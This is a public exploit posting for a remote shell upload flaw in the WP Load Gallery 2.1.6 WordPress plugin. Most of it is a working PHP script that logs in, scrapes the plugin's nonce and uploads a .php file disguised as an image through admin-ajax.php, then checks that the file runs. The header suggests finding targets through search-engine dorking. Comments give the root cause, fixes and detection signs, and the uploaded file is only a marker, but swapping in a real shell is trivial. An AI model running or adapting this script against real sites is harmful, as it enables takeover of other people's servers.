## https://sploitus.com/exploit?id=PACKETSTORM:189550
=============================================================================================================================================
    | # Title     : WP Load Gallery plugin v2.1.6 Code Injection Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wphive.com/plugins/wp-load-gallery/                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] WP Load Gallery plugin version 2.1.6 suffers from a remote shell upload vulnerability.
    
    [+] save code as poc.php .
    
    [+] Usage : cmd => c:\www\test\php poc.php -u <URL> -un <USERNAME> -p <PASSWORD>
    
    [+] PayLoad :
    
    <?php
    // Security test script — intended for a local/lab environment only.
    //
    // What this script does (as written): checks that the plugin directory is
    // reachable, logs in to WordPress with supplied credentials, scrapes the
    // "wplg_nonce" from the plugin's admin page, then submits a multipart upload
    // to admin-ajax.php in which a file with a .php name is declared as image/jpeg.
    //
    // Root cause being demonstrated: the upload handler trusts the client-supplied
    // filename/MIME type instead of validating the extension and content server-side.
    // Mitigation (defender): update the plugin; enforce an extension/MIME allowlist on
    // the server side (e.g. wp_check_filetype_and_ext()), and deny PHP execution inside
    // wp-content/uploads/ at the web-server level.
    // Detection: authenticated POSTs to /wp-admin/admin-ajax.php with
    // action=wpgallery and task=wplg_upload whose multipart filename ends in .php;
    // new *.php files appearing under wp-content/uploads/.
    //
    // Arguments are positional ($argv[1], $argv[2], $argv[3]); see the die() message below.
    $target_url = $argv[1] ?? '';
    $username = $argv[2] ?? '';
    $password = $argv[3] ?? '';
    
    // Empty-string check via truthiness; a literal "0" argument would also fail here.
    if (!$target_url || !$username || !$password) {
        die("Usage: php script.php <url> <username> <password>\n");
    }
    
    $target_url = rtrim($target_url, '/');
    $login_url = "$target_url/wp-login.php";
    $gallery_url = "$target_url/wp-admin/admin.php?page=wp-load-gallery";
    $ajax_url = "$target_url/wp-admin/admin-ajax.php";
    $shell_filename = "indoushka.php";
    // Expected location is a hard-coded year/month path; it is not derived from the
    // upload response, so the later verification step depends on this guess being right.
    $shell_path = "$target_url/wp-content/uploads/2025/02/$shell_filename";
    // Harmless marker payload; the verification step below looks for this exact text.
    $shell_content = "<?php echo 'Hello, Security Test!'; ?>";
    // Static User-Agent sent on every request (a usable string for log correlation).
    $user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0";
    
    // Check that the plugin is present: GET the plugin directory and require HTTP 200.
    // A transport failure leaves $http_code at 0, which also aborts the script here.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$target_url/wp-content/plugins/wp-load-gallery/");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code !== 200) {
        die("[!] WP Load Gallery غير مثبت أو غير مفعل.\n");
    }
    
    // Create the payload file. Side effect: writes $shell_filename into the current
    // working directory (relative path); the return value is not checked.
    file_put_contents($shell_filename, $shell_content);
    
    // Log in through the standard wp-login.php form fields.
    $login_data = [
        "log" => $username,
        "pwd" => $password,
        "rememberme" => "forever",
        "wp-submit" => "Log In"
    ];
    
    // Side effect: session cookies are persisted to cookies.txt in the working
    // directory and reused by every later request.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Login is judged purely by the substring 'dashboard' appearing in the response body.
    if (!strpos($response, 'dashboard')) {
        die("[!] فشل تسجيل الدخول.\n");
    }
    
    echo "[+] تسجيل الدخول ناجح.\n";
    
    // Extract wplg_nonce: the plugin's admin page is fetched with the session cookie
    // and the nonce is scraped from a "wplg_nonce" ... value="..." attribute pair.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $gallery_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (preg_match('/"wplg_nonce"\s*value="(\w+)"/', $response, $matches)) {
        $wplg_nonce = $matches[1];
        echo "[+] تم استخراج wplg_nonce: $wplg_nonce\n";
    } else {
        die("[!] فشل استخراج wplg_nonce.\n");
    }
    
    // Upload the file. The multipart part is declared as image/jpeg while the
    // filename keeps its .php extension — this mismatch is the crux of the issue,
    // and is exactly what server-side extension/content validation must reject.
    // The gallery id is hard-coded.
    $upload_data = [
        "wplg_nonce" => $wplg_nonce,
        "action" => "wpgallery",
        "wplg_gallery_id" => "205",
        "task" => "wplg_upload",
        "wplg_gallery_file[]" => new CURLFile($shell_filename, "image/jpeg", $shell_filename)
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $upload_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Success is inferred from the substring 'status' in the AJAX response, not from
    // a parsed result; the follow-up GET below is the real confirmation.
    if (strpos($response, 'status') !== false) {
        echo "[+] تم رفع الملف بنجاح!\n";
        echo "[+] التحقق من وجود الملف على: $shell_path\n";
    
        // Verify the upload: fetch the guessed path and look for the marker string.
        // If PHP execution is disabled in the uploads directory, the marker is not
        // rendered and this reports failure even though a file may have been stored.
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $shell_path);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
        $response = curl_exec($ch);
        curl_close($ch);
    
        if (strpos($response, 'Hello, Security Test!') !== false) {
            echo "[+] تم رفع الملف بنجاح وهو يعمل!\n";
        } else {
            echo "[!] الملف غير موجود أو لم يعمل كما هو متوقع.\n";
        }
    } else {
        echo "[!] فشل رفع الملف، الرجاء التحقق يدويًا.\n";
    }
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================